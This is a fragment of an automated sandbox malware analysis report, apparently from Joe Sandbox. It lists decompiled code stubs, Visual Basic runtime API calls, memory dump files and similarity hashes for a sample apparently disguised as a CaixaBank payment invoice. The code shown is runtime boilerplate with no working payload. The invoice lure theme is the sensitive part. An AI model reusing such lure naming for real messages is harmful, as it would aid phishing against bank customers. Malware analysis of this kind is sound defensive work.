        				_v36 = _v36 & 0x00000000;
        				L00401318();
        				L00401378();
        				_push(0x40ce1f);
        				L00401342();
        				return _t52;
        			}




















        0x0040cd19
        0x0040cd24
        0x0040cd25
        0x0040cd2c
        0x0040cd2f
        0x0040cd37
        0x0040cd3a
        0x0040cd48
        0x0040cd62
        0x0040cd4a
        0x0040cd4a
        0x0040cd4f
        0x0040cd54
        0x0040cd59
        0x0040cd59
        0x0040cd6e
        0x0040cd7d
        0x0040cd80
        0x0040cd82
        0x0040cd89
        0x0040cda2
        0x0040cd8b
        0x0040cd8b
        0x0040cd8d
        0x0040cd92
        0x0040cd95
        0x0040cd98
        0x0040cd9d
        0x0040cd9d
        0x0040cda9
        0x0040cdb8
        0x0040cdbb
        0x0040cdbd
        0x0040cdc4
        0x0040cddd
        0x0040cdc6
        0x0040cdc6
        0x0040cdc8
        0x0040cdcd
        0x0040cdd0
        0x0040cdd3
        0x0040cdd8
        0x0040cdd8
        0x0040cde1
        0x0040cde4
        0x0040cde7
        0x0040cdf1
        0x0040cdf9
        0x0040cdfe
        0x0040ce19
        0x0040ce1e

        APIs
        • __vbaChkstk.MSVBVM60(?,00401246), ref: 0040CD2F
        • __vbaNew2.MSVBVM60(00402D0C,0040EB0C,?,?,?,?,00401246), ref: 0040CD54
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402CFC,00000014), ref: 0040CD98
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402D88,00000058), ref: 0040CDD3
        • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401246), ref: 0040CDF1
        • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401246), ref: 0040CDF9
        • __vbaFreeStr.MSVBVM60(0040CE1F), ref: 0040CE19
        Memory Dump Source
        • Source File: 00000000.00000002.1172948703.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1172930676.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1172990240.000000000040E000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1173000183.0000000000410000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 .jbxd
        Similarity
        • API ID: __vba$CheckFreeHresult$ChkstkMoveNew2
        • String ID:
        • API String ID: 1253681662-0
        • Opcode ID: 2f97c1f70fcd0b6bfa70407b856ff3a439762a555a9ba90e35c559c843db89aa
        • Instruction ID: f731662f3be84224fe48acd3f9a84e838f8526bc8b8c815c283595e8ba78753a
        • Opcode Fuzzy Hash: 2f97c1f70fcd0b6bfa70407b856ff3a439762a555a9ba90e35c559c843db89aa
        • Instruction Fuzzy Hash: 8431D071940208EFDB10DB95C98AFDDBBB5BF08705F20427AF402B62A0C7786955DF68
        Uniqueness

        Uniqueness Score: -1.00%